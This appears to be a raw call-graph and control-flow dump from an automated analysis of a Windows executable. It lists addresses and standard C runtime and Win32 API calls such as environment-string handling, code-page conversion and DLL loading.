7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18762->18763 18763->18751 18765 7ff72b0702c9 18764->18765 18766 7ff72b0702b1 18764->18766 18767 7ff72b06dea8 _get_daylight 11 API calls 18765->18767 18766->18641 18772 7ff72b0702ed 18767->18772 18768 7ff72b07034e 18771 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18768->18771 18769 7ff72b069814 __GetCurrentState 45 API calls 18770 7ff72b070378 18769->18770 18771->18766 18772->18768 18773 7ff72b06dea8 _get_daylight 11 API calls 18772->18773 18774 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18772->18774 18775 7ff72b0697b4 __std_exception_copy 37 API calls 18772->18775 18776 7ff72b07035d 18772->18776 18778 7ff72b070372 18772->18778 18773->18772 18774->18772 18775->18772 18777 7ff72b069c10 _isindst 17 API calls 18776->18777 18777->18778 18778->18769 18780 7ff72b0689f1 18779->18780 18781 7ff72b0689e8 18779->18781 18780->18655 18780->18656 18781->18780 18894 7ff72b0684b0 18781->18894 18786 7ff72b076449 18785->18786 18787 7ff72b075564 18785->18787 18789 7ff72b064178 45 API calls 18786->18789 18788 7ff72b075571 18787->18788 18794 7ff72b0755a7 18787->18794 18790 7ff72b0643f4 _get_daylight 11 API calls 18788->18790 18795 7ff72b075518 18788->18795 18791 7ff72b07647d 18789->18791 18793 7ff72b07557b 18790->18793 18797 7ff72b076493 18791->18797 18801 7ff72b0764aa 18791->18801 18815 7ff72b076482 18791->18815 18792 7ff72b0755d1 18796 7ff72b0643f4 _get_daylight 11 API calls 18792->18796 18799 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18793->18799 18794->18792 18800 7ff72b0755f6 18794->18800 18795->18660 18798 7ff72b0755d6 18796->18798 18803 7ff72b0643f4 _get_daylight 11 API calls 18797->18803 18802 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18798->18802 18804 7ff72b075586 18799->18804 18805 7ff72b0755e1 18800->18805 18809 7ff72b064178 45 API calls 18800->18809 18807 7ff72b0764c6 18801->18807 18808 7ff72b0764b4 18801->18808 18802->18805 18806 7ff72b076498 18803->18806 18804->18660 18805->18660 18810 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18806->18810 18812 7ff72b0764ee 18807->18812 18813 7ff72b0764d7 18807->18813 18811 7ff72b0643f4 _get_daylight 11 API calls 18808->18811 18809->18805 18810->18815 18816 7ff72b0764b9 18811->18816 19126 7ff72b07825c 18812->19126 19117 7ff72b0755b4 18813->19117 18815->18660 18819 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18816->18819 18819->18815 18820 7ff72b0643f4 _get_daylight 11 API calls 18820->18815 18822 7ff72b07270e 18821->18822 18823 7ff72b07272b 18821->18823 18822->18823 18824 7ff72b07271c 18822->18824 18825 7ff72b072735 18823->18825 19166 7ff72b076f48 18823->19166 18827 7ff72b0643f4 _get_daylight 11 API calls 18824->18827 19173 7ff72b076f84 18825->19173 18829 7ff72b072721 __scrt_get_show_window_mode 18827->18829 18829->18675 18831 7ff72b064178 45 API calls 18830->18831 18832 7ff72b0765ba 18831->18832 18833 7ff72b0765c8 18832->18833 19185 7ff72b06e234 18832->19185 19188 7ff72b0647bc 18833->19188 18837 7ff72b0766b4 18840 7ff72b0766c5 18837->18840 18842 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18837->18842 18838 7ff72b064178 45 API calls 18839 7ff72b076637 18838->18839 18841 7ff72b076640 18839->18841 18844 7ff72b06e234 5 API calls 18839->18844 18843 7ff72b06feb3 18840->18843 18845 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18840->18845 18846 7ff72b0647bc 14 API calls 18841->18846 18842->18840 18843->18694 18843->18695 18844->18841 18845->18843 18847 7ff72b07669b 18846->18847 18847->18837 18848 7ff72b0766a3 SetEnvironmentVariableW 18847->18848 18848->18837 18850 7ff72b0703bc 18849->18850 18857 7ff72b07039f 18849->18857 18851 7ff72b06dea8 _get_daylight 11 API calls 18850->18851 18852 7ff72b0703e0 18851->18852 18853 7ff72b070441 18852->18853 18858 7ff72b06dea8 _get_daylight 11 API calls 18852->18858 18859 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18852->18859 18860 7ff72b06f784 37 API calls 18852->18860 18861 7ff72b070450 18852->18861 18863 7ff72b070464 18852->18863 18855 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18853->18855 18854 7ff72b069814 __GetCurrentState 45 API calls 18856 7ff72b07046a 18854->18856 18855->18857 18857->18706 18858->18852 18859->18852 18860->18852 18862 7ff72b069c10 _isindst 17 API calls 18861->18862 18862->18863 18863->18854 18865 7ff72b068a24 18864->18865 18868 7ff72b068a2d 18864->18868 18865->18868 19210 7ff72b068524 18865->19210 18868->18725 18868->18726 18871 7ff72b076309 18870->18871 18875 7ff72b076336 18870->18875 18872 7ff72b07630e 18871->18872 18871->18875 18873 7ff72b0643f4 _get_daylight 11 API calls 18872->18873 18876 7ff72b076313 18873->18876 18874 7ff72b07637a 18877 7ff72b0643f4 _get_daylight 11 API calls 18874->18877 18875->18874 18878 7ff72b076399 18875->18878 18892 7ff72b07636e __crtLCMapStringW 18875->18892 18879 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18876->18879 18880 7ff72b07637f 18877->18880 18881 7ff72b0763b5 18878->18881 18882 7ff72b0763a3 18878->18882 18883 7ff72b07631e 18879->18883 18885 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18880->18885 18884 7ff72b064178 45 API calls 18881->18884 18886 7ff72b0643f4 _get_daylight 11 API calls 18882->18886 18883->18718 18887 7ff72b0763c2 18884->18887 18885->18892 18888 7ff72b0763a8 18886->18888 18887->18892 19257 7ff72b077e18 18887->19257 18889 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18888->18889 18889->18892 18892->18718 18893 7ff72b0643f4 _get_daylight 11 API calls 18893->18892 18895 7ff72b0684c9 18894->18895 18908 7ff72b0684c5 18894->18908 18917 7ff72b071900 18895->18917 18900 7ff72b0684db 18902 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18900->18902 18901 7ff72b0684e7 18943 7ff72b068594 18901->18943 18902->18908 18905 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18906 7ff72b06850e 18905->18906 18907 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18906->18907 18907->18908 18908->18780 18909 7ff72b068804 18908->18909 18910 7ff72b06882d 18909->18910 18916 7ff72b068846 18909->18916 18910->18780 18911 7ff72b06dea8 _get_daylight 11 API calls 18911->18916 18912 7ff72b0688d6 18914 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18912->18914 18913 7ff72b06faf8 WideCharToMultiByte 18913->18916 18914->18910 18915 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18915->18916 18916->18910 18916->18911 18916->18912 18916->18913 18916->18915 18918 7ff72b07190d 18917->18918 18922 7ff72b0684ce 18917->18922 18962 7ff72b06a534 18918->18962 18923 7ff72b071c3c GetEnvironmentStringsW 18922->18923 18924 7ff72b071c6c 18923->18924 18925 7ff72b0684d3 18923->18925 18926 7ff72b06faf8 WideCharToMultiByte 18924->18926 18925->18900 18925->18901 18927 7ff72b071cbd 18926->18927 18928 7ff72b071cc4 FreeEnvironmentStringsW 18927->18928 18929 7ff72b06c90c _fread_nolock 12 API calls 18927->18929 18928->18925 18930 7ff72b071cd7 18929->18930 18931 7ff72b071ce8 18930->18931 18932 7ff72b071cdf 18930->18932 18934 7ff72b06faf8 WideCharToMultiByte 18931->18934 18933 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18932->18933 18935 7ff72b071ce6 18933->18935 18936 7ff72b071d0b 18934->18936 18935->18928 18937 7ff72b071d19 18936->18937 18938 7ff72b071d0f 18936->18938 18940 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18937->18940 18939 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18938->18939 18941 7ff72b071d17 FreeEnvironmentStringsW 18939->18941 18940->18941 18941->18925 18944 7ff72b0685b9 18943->18944 18945 7ff72b06dea8 _get_daylight 11 API calls 18944->18945 18955 7ff72b0685ef 18945->18955 18946 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18948 7ff72b0684ef 18946->18948 18947 7ff72b06866a 18949 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18947->18949 18948->18905 18949->18948 18950 7ff72b06dea8 _get_daylight 11 API calls 18950->18955 18951 7ff72b068659 19111 7ff72b0687c0 18951->19111 18952 7ff72b0697b4 __std_exception_copy 37 API calls 18952->18955 18955->18947 18955->18950 18955->18951 18955->18952 18956 7ff72b06868f 18955->18956 18958 7ff72b0685f7 18955->18958 18960 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18955->18960 18959 7ff72b069c10 _isindst 17 API calls 18956->18959 18957 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18957->18958 18958->18946 18961 7ff72b0686a2 18959->18961 18960->18955 18963 7ff72b06a545 FlsGetValue 18962->18963 18964 7ff72b06a560 FlsSetValue 18962->18964 18966 7ff72b06a552 18963->18966 18967 7ff72b06a55a 18963->18967 18965 7ff72b06a56d 18964->18965 18964->18966 18970 7ff72b06dea8 _get_daylight 11 API calls 18965->18970 18968 7ff72b06a558 18966->18968 18969 7ff72b069814 __GetCurrentState 45 API calls 18966->18969 18967->18964 18982 7ff72b0715d4 18968->18982 18971 7ff72b06a5d5 18969->18971 18972 7ff72b06a57c 18970->18972 18973 7ff72b06a59a FlsSetValue 18972->18973 18974 7ff72b06a58a FlsSetValue 18972->18974 18976 7ff72b06a5b8 18973->18976 18977 7ff72b06a5a6 FlsSetValue 18973->18977 18975 7ff72b06a593 18974->18975 18978 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18975->18978 18979 7ff72b06a204 _get_daylight 11 API calls 18976->18979 18977->18975 18978->18966 18980 7ff72b06a5c0 18979->18980 18981 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18980->18981 18981->18968 19005 7ff72b071844 18982->19005 18984 7ff72b071609 19020 7ff72b0712d4 18984->19020 18987 7ff72b071626 18987->18922 18988 7ff72b06c90c _fread_nolock 12 API calls 18989 7ff72b071637 18988->18989 18990 7ff72b07163f 18989->18990 18992 7ff72b07164e 18989->18992 18991 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18990->18991 18991->18987 18992->18992 19027 7ff72b07197c 18992->19027 18995 7ff72b07174a 18996 7ff72b0643f4 _get_daylight 11 API calls 18995->18996 18998 7ff72b07174f 18996->18998 18997 7ff72b0717a5 19001 7ff72b07180c 18997->19001 19038 7ff72b071104 18997->19038 18999 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18998->18999 18999->18987 19000 7ff72b071764 19000->18997 19002 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19000->19002 19004 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19001->19004 19002->18997 19004->18987 19006 7ff72b071867 19005->19006 19007 7ff72b071871 19006->19007 19053 7ff72b06f5e8 EnterCriticalSection 19006->19053 19009 7ff72b0718e3 19007->19009 19011 7ff72b069814 __GetCurrentState 45 API calls 19007->19011 19009->18984 19014 7ff72b0718fb 19011->19014 19015 7ff72b071952 19014->19015 19017 7ff72b06a534 50 API calls 19014->19017 19015->18984 19018 7ff72b07193c 19017->19018 19019 7ff72b0715d4 65 API calls 19018->19019 19019->19015 19021 7ff72b064178 45 API calls 19020->19021 19022 7ff72b0712e8 19021->19022 19023 7ff72b071306 19022->19023 19024 7ff72b0712f4 GetOEMCP 19022->19024 19025 7ff72b07130b GetACP 19023->19025 19026 7ff72b07131b 19023->19026 19024->19026 19025->19026 19026->18987 19026->18988 19028 7ff72b0712d4 47 API calls 19027->19028 19029 7ff72b0719a9 19028->19029 19030 7ff72b071aff 19029->19030 19031 7ff72b0719e6 IsValidCodePage 19029->19031 19037 7ff72b071a00 __scrt_get_show_window_mode 19029->19037 19032 7ff72b05b870 _log10_special 8 API calls 19030->19032 19031->19030 19033 7ff72b0719f7 19031->19033 19034 7ff72b071741 19032->19034 19035 7ff72b071a26 GetCPInfo 19033->19035 19033->19037 19034->18995 19034->19000 19035->19030 19035->19037 19054 7ff72b0713ec 19037->19054 19110 7ff72b06f5e8 EnterCriticalSection 19038->19110 19055 7ff72b071429 GetCPInfo 19054->19055 19056 7ff72b07151f 19054->19056 19055->19056 19058 7ff72b07143c 19055->19058 19057 7ff72b05b870 _log10_special 8 API calls 19056->19057 19059 7ff72b0715be 19057->19059 19060 7ff72b072150 48 API calls 19058->19060 19059->19030 19061 7ff72b0714b3 19060->19061 19065 7ff72b076e94 19061->19065 19064 7ff72b076e94 54 API calls 19064->19056 19066 7ff72b064178 45 API calls 19065->19066 19067 7ff72b076eb9 19066->19067 19070 7ff72b076b60 19067->19070 19071 7ff72b076ba1 19070->19071 19072 7ff72b06ebb0 _fread_nolock MultiByteToWideChar 19071->19072 19075 7ff72b076beb 19072->19075 19073 7ff72b076e69 19074 7ff72b05b870 _log10_special 8 API calls 19073->19074 19076 7ff72b0714e6 19074->19076 19075->19073 19077 7ff72b06c90c _fread_nolock 12 API calls 19075->19077 19079 7ff72b076c23 19075->19079 19090 7ff72b076d21 19075->19090 19076->19064 19077->19079 19078 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19078->19073 19080 7ff72b06ebb0 _fread_nolock MultiByteToWideChar 19079->19080 19079->19090 19081 7ff72b076c96 19080->19081 19081->19090 19101 7ff72b06e3f4 19081->19101 19084 7ff72b076ce1 19087 7ff72b06e3f4 __crtLCMapStringW 6 API calls 19084->19087 19084->19090 19085 7ff72b076d32 19086 7ff72b06c90c _fread_nolock 12 API calls 19085->19086 19088 7ff72b076e04 19085->19088 19089 7ff72b076d50 19085->19089 19086->19089 19087->19090 19088->19090 19091 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19088->19091 19089->19090 19092 7ff72b06e3f4 __crtLCMapStringW 6 API calls 19089->19092 19090->19073 19090->19078 19091->19090 19093 7ff72b076dd0 19092->19093 19093->19088 19094 7ff72b076e06 19093->19094 19095 7ff72b076df0 19093->19095 19096 7ff72b06faf8 WideCharToMultiByte 19094->19096 19097 7ff72b06faf8 WideCharToMultiByte 19095->19097 19098 7ff72b076dfe 19096->19098 19097->19098 19098->19088 19099 7ff72b076e1e 19098->19099 19099->19090 19100 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19099->19100 19100->19090 19102 7ff72b06e020 __crtLCMapStringW 5 API calls 19101->19102 19103 7ff72b06e432 19102->19103 19104 7ff72b06e43a 19103->19104 19107 7ff72b06e4e0 19103->19107 19104->19084 19104->19085 19104->19090 19106 7ff72b06e4a3 LCMapStringW 19106->19104 19108 7ff72b06e020 __crtLCMapStringW 5 API calls 19107->19108 19109 7ff72b06e50e __crtLCMapStringW 19108->19109 19109->19106 19112 7ff72b0687c5 19111->19112 19113 7ff72b068661 19111->19113 19114 7ff72b0687ee 19112->19114 19115 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19112->19115 19113->18957 19116 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19114->19116 19115->19112 19116->19113 19118 7ff72b0755d1 19117->19118 19119 7ff72b0755e8 19117->19119 19120 7ff72b0643f4 _get_daylight 11 API calls 19118->19120 19119->19118 19122 7ff72b0755f6 19119->19122 19121 7ff72b0755d6 19120->19121 19123 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 19121->19123 19124 7ff72b064178 45 API calls 19122->19124 19125 7ff72b0755e1 19122->19125 19123->19125 19124->19125 19125->18815 19127 7ff72b064178 45 API calls 19126->19127 19128 7ff72b078281 19127->19128 19131 7ff72b077ed8 19128->19131 19133 7ff72b077f26 19131->19133 19132 7ff72b05b870 _log10_special 8 API calls 19134 7ff72b076515 19132->19134 19135 7ff72b077fad 19133->19135 19137 7ff72b077f98 GetCPInfo 19133->19137 19140 7ff72b077fb1 19133->19140 19134->18815 19134->18820 19136 7ff72b06ebb0 _fread_nolock MultiByteToWideChar 19135->19136 19135->19140 19138 7ff72b078045 19136->19138 19137->19135 19137->19140 19139 7ff72b06c90c _fread_nolock 12 API calls 19138->19139 19138->19140 19141 7ff72b07807c 19138->19141 19139->19141 19140->19132 19141->19140 19142 7ff72b06ebb0 _fread_nolock MultiByteToWideChar 19141->19142 19143 7ff72b0780ea 19142->19143 19144 7ff72b06ebb0 _fread_nolock MultiByteToWideChar 19143->19144 19153 7ff72b0781cc 19143->19153 19146 7ff72b078110 19144->19146 19145 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19145->19140 19147 7ff72b06c90c _fread_nolock 12 API calls 19146->19147 19148 7ff72b07813d 19146->19148 19146->19153 19147->19148 19149 7ff72b06ebb0 _fread_nolock MultiByteToWideChar 19148->19149 19148->19153 19150 7ff72b0781b4 19149->19150 19151 7ff72b0781ba 19150->19151 19152 7ff72b0781d4 19150->19152 19151->19153 19155 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19151->19155 19160 7ff72b06e278 19152->19160 19153->19140 19153->19145 19155->19153 19157 7ff72b078213 19157->19140 19159 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19157->19159 19158 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19158->19157 19159->19140 19161 7ff72b06e020 __crtLCMapStringW 5 API calls 19160->19161 19162 7ff72b06e2b6 19161->19162 19163 7ff72b06e2be 19162->19163 19164 7ff72b06e4e0 __crtLCMapStringW 5 API calls 19162->19164 19163->19157 19163->19158 19165 7ff72b06e327 CompareStringW 19164->19165 19165->19163 19167 7ff72b076f6a HeapSize 19166->19167 19168 7ff72b076f51 19166->19168 19169 7ff72b0643f4 _get_daylight 11 API calls 19168->19169 19170 7ff72b076f56 19169->19170 19171 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 19170->19171 19172 7ff72b076f61 19171->19172 19172->18825 19174 7ff72b076f99 19173->19174 19175 7ff72b076fa3 19173->19175 19176 7ff72b06c90c _fread_nolock 12 API calls 19174->19176 19177 7ff72b076fa8 19175->19177 19178 7ff72b076faf _get_daylight 19175->19178 19183 7ff72b076fa1 19176->19183 19179 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19177->19179 19180 7ff72b076fb5 19178->19180 19181 7ff72b076fe2 HeapReAlloc 19178->19181 19184 7ff72b0728a0 _get_daylight 2 API calls 19178->19184 19179->19183 19182 7ff72b0643f4 _get_daylight 11 API calls 19180->19182 19181->19178 19181->19183 19182->19183 19183->18829 19184->19178 19186 7ff72b06e020 __crtLCMapStringW 5 API calls 19185->19186 19187 7ff72b06e254 19186->19187 19187->18833 19189 7ff72b06480a 19188->19189 19190 7ff72b0647e6 19188->19190 19191 7ff72b064864 19189->19191 19192 7ff72b06480f 19189->19192 19194 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19190->19194 19195 7ff72b0647f5 19190->19195 19193 7ff72b06ebb0 _fread_nolock MultiByteToWideChar 19191->19193 19192->19195 19196 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19192->19196 19201 7ff72b064824 19192->19201 19200 7ff72b064880 19193->19200 19194->19195 19195->18837 19195->18838 19196->19201 19197 7ff72b06c90c _fread_nolock 12 API calls 19197->19195 19198 7ff72b064887 GetLastError 19202 7ff72b064368 _fread_nolock 11 API calls 19198->19202 19199 7ff72b0648c2 19199->19195 19204 7ff72b06ebb0 _fread_nolock MultiByteToWideChar 19199->19204 19200->19198 19200->19199 19203 7ff72b0648b5 19200->19203 19206 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19200->19206 19201->19197 19205 7ff72b064894 19202->19205 19207 7ff72b06c90c _fread_nolock 12 API calls 19203->19207 19208 7ff72b064906 19204->19208 19209 7ff72b0643f4 _get_daylight 11 API calls 19205->19209 19206->19203 19207->19199 19208->19195 19208->19198 19209->19195 19211 7ff72b06853d 19210->19211 19212 7ff72b068539 19210->19212 19231 7ff72b071d4c GetEnvironmentStringsW 19211->19231 19212->18868 19223 7ff72b0688e4 19212->19223 19215 7ff72b06854a 19217 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19215->19217 19216 7ff72b068556 19238 7ff72b0686a4 19216->19238 19217->19212 19220 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19221 7ff72b06857d 19220->19221 19222 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19221->19222 19222->19212 19224 7ff72b068907 19223->19224 19226 7ff72b06891e 19223->19226 19224->18868 19225 7ff72b06ebb0 MultiByteToWideChar _fread_nolock 19225->19226 19226->19224 19226->19225 19227 7ff72b06dea8 _get_daylight 11 API calls 19226->19227 19228 7ff72b068992 19226->19228 19230 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19226->19230 19227->19226 19229 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19228->19229 19229->19224 19230->19226 19232 7ff72b068542 19231->19232 19234 7ff72b071d70 19231->19234 19232->19215 19232->19216 19233 7ff72b06c90c _fread_nolock 12 API calls 19235 7ff72b071da7 memcpy_s 19233->19235 19234->19233 19236 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19235->19236 19237 7ff72b071dc7 FreeEnvironmentStringsW 19236->19237 19237->19232 19239 7ff72b0686cc 19238->19239 19240 7ff72b06dea8 _get_daylight 11 API calls 19239->19240 19253 7ff72b068707 19240->19253 19241 7ff72b06870f 19242 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19241->19242 19243 7ff72b06855e 19242->19243 19243->19220 19244 7ff72b068789 19245 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19244->19245 19245->19243 19246 7ff72b06dea8 _get_daylight 11 API calls 19246->19253 19247 7ff72b068778 19248 7ff72b0687c0 11 API calls 19247->19248 19250 7ff72b068780 19248->19250 19249 7ff72b06f784 37 API calls 19249->19253 19251 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19250->19251 19251->19241 19252 7ff72b0687ac 19255 7ff72b069c10 _isindst 17 API calls 19252->19255 19253->19241 19253->19244 19253->19246 19253->19247 19253->19249 19253->19252 19254 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19253->19254 19254->19253 19256 7ff72b0687be 19255->19256 19258 7ff72b077e41 __crtLCMapStringW 19257->19258 19259 7ff72b0763fe 19258->19259 19260 7ff72b06e278 6 API calls 19258->19260 19259->18892 19259->18893 19260->19259 19574 7ff72b069060 19577 7ff72b068fe4 19574->19577 19584 7ff72b06f5e8 EnterCriticalSection 19577->19584 20189 7ff72b06a2e0 20190 7ff72b06a2e5 20189->20190 20194 7ff72b06a2fa 20189->20194 20195 7ff72b06a300 20190->20195 20196 7ff72b06a34a 20195->20196 20197 7ff72b06a342 20195->20197 20198 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20196->20198 20199 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20197->20199 20200 7ff72b06a357 20198->20200 20199->20196 20201 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20200->20201 20202 7ff72b06a364 20201->20202 20203 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20202->20203 20204 7ff72b06a371 20203->20204 20205 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20204->20205 20206 7ff72b06a37e 20205->20206 20207 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20206->20207 20208 7ff72b06a38b 20207->20208 20209 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20208->20209 20210 7ff72b06a398 20209->20210 20211 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20210->20211 20212 7ff72b06a3a5 20211->20212 20213 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20212->20213 20214 7ff72b06a3b5 20213->20214 20215 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20214->20215 20216 7ff72b06a3c5 20215->20216 20221 7ff72b06a1a4 20216->20221 20235 7ff72b06f5e8 EnterCriticalSection 20221->20235 20237 7ff72b07a10e 20238 7ff72b07a11d 20237->20238 20239 7ff72b07a127 20237->20239 20241 7ff72b06f648 LeaveCriticalSection 20238->20241 18581 7ff72b068c79 18582 7ff72b0696e8 45 API calls 18581->18582 18583 7ff72b068c7e 18582->18583 18584 7ff72b068ca5 GetModuleHandleW 18583->18584 18585 7ff72b068cef 18583->18585 18584->18585 18591 7ff72b068cb2 18584->18591 18593 7ff72b068b7c 18585->18593 18591->18585 18607 7ff72b068da0 GetModuleHandleExW 18591->18607 18613 7ff72b06f5e8 EnterCriticalSection 18593->18613 18608 7ff72b068dfd 18607->18608 18609 7ff72b068dd4 GetProcAddress 18607->18609 18611 7ff72b068e09 18608->18611 18612 7ff72b068e02 FreeLibrary 18608->18612 18610 7ff72b068de6 18609->18610 18610->18608 18611->18585 18612->18611 19599 7ff72b07a079 19602 7ff72b064788 LeaveCriticalSection 19599->19602

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 7ff72b051000-7ff72b053536 call 7ff72b05f138 call 7ff72b05f140 call 7ff72b05bb70 call 7ff72b064700 call 7ff72b064794 call 7ff72b0533e0 14 7ff72b053538-7ff72b05353f 0->14 15 7ff72b053544-7ff72b053566 call 7ff72b0518f0 0->15 16 7ff72b05371a-7ff72b053735 call 7ff72b05b870 14->16 20 7ff72b05356c-7ff72b053583 call 7ff72b051bf0 15->20 21 7ff72b053736-7ff72b05374c call 7ff72b053f70 15->21 26 7ff72b053588-7ff72b0535c1 20->26 27 7ff72b05374e-7ff72b05377b call 7ff72b0576a0 21->27 28 7ff72b053785-7ff72b05379a call 7ff72b0525f0 21->28 29 7ff72b0535c7-7ff72b0535cb 26->29 30 7ff72b053653-7ff72b05366d call 7ff72b057e10 26->30 41 7ff72b05377d-7ff72b053780 call 7ff72b05f36c 27->41 42 7ff72b05379f-7ff72b0537be call 7ff72b051bf0 27->42 44 7ff72b053712 28->44 33 7ff72b0535cd-7ff72b0535e5 call 7ff72b064560 29->33 34 7ff72b053638-7ff72b05364d call 7ff72b0518e0 29->34 46 7ff72b053695-7ff72b05369c 30->46 47 7ff72b05366f-7ff72b053675 30->47 50 7ff72b0535e7-7ff72b0535eb 33->50 51 7ff72b0535f2-7ff72b05360a call 7ff72b064560 33->51 34->29 34->30 41->28 63 7ff72b0537c1-7ff72b0537ca 42->63 44->16 54 7ff72b053844-7ff72b053863 call 7ff72b053e90 46->54 55 7ff72b0536a2-7ff72b0536c0 call 7ff72b057e10 call 7ff72b057f80 46->55 52 7ff72b053677-7ff72b053680 47->52 53 7ff72b053682-7ff72b053690 call 7ff72b06415c 47->53 50->51 69 7ff72b05360c-7ff72b053610 51->69 70 7ff72b053617-7ff72b05362f call 7ff72b064560 51->70 52->53 53->46 66 7ff72b053865-7ff72b05386f call 7ff72b053fe0 54->66 67 7ff72b053871-7ff72b053882 call 7ff72b051bf0 54->67 77 7ff72b0536c6-7ff72b0536c9 55->77 78 7ff72b05380f-7ff72b05381e call 7ff72b058400 55->78 63->63 68 7ff72b0537cc-7ff72b0537e9 call 7ff72b0518f0 63->68 80 7ff72b053887-7ff72b0538a1 call 7ff72b0586b0 66->80 67->80 68->26 82 7ff72b0537ef-7ff72b053800 call 7ff72b0525f0 68->82 69->70 70->34 83 7ff72b053631 70->83 77->78 84 7ff72b0536cf-7ff72b0536f6 call 7ff72b051bf0 77->84 93 7ff72b05382c-7ff72b05382f call 7ff72b057c40 78->93 94 7ff72b053820 78->94 95 7ff72b0538a3 80->95 96 7ff72b0538af-7ff72b0538c1 SetDllDirectoryW 80->96 82->44 83->34 97 7ff72b0536fc-7ff72b053703 call 7ff72b0525f0 84->97 98 7ff72b053805-7ff72b05380d call 7ff72b06415c 84->98 105 7ff72b053834-7ff72b053836 93->105 94->93 95->96 100 7ff72b0538c3-7ff72b0538ca 96->100 101 7ff72b0538d0-7ff72b0538ec call 7ff72b056560 call 7ff72b056b00 96->101 109 7ff72b053708-7ff72b05370a 97->109 98->80 100->101 106 7ff72b053a50-7ff72b053a58 100->106 117 7ff72b0538ee-7ff72b0538f4 101->117 118 7ff72b053947-7ff72b05394a call 7ff72b056510 101->118 105->80 112 7ff72b053838 105->112 110 7ff72b053a7d-7ff72b053aaf call 7ff72b0533d0 call 7ff72b053080 call 7ff72b0533a0 call 7ff72b056780 call 7ff72b056510 106->110 111 7ff72b053a5a-7ff72b053a77 PostMessageW GetMessageW 106->111 109->44 111->110 112->54 121 7ff72b05390e-7ff72b053918 call 7ff72b056970 117->121 122 7ff72b0538f6-7ff72b053903 call 7ff72b0565a0 117->122 126 7ff72b05394f-7ff72b053956 118->126 135 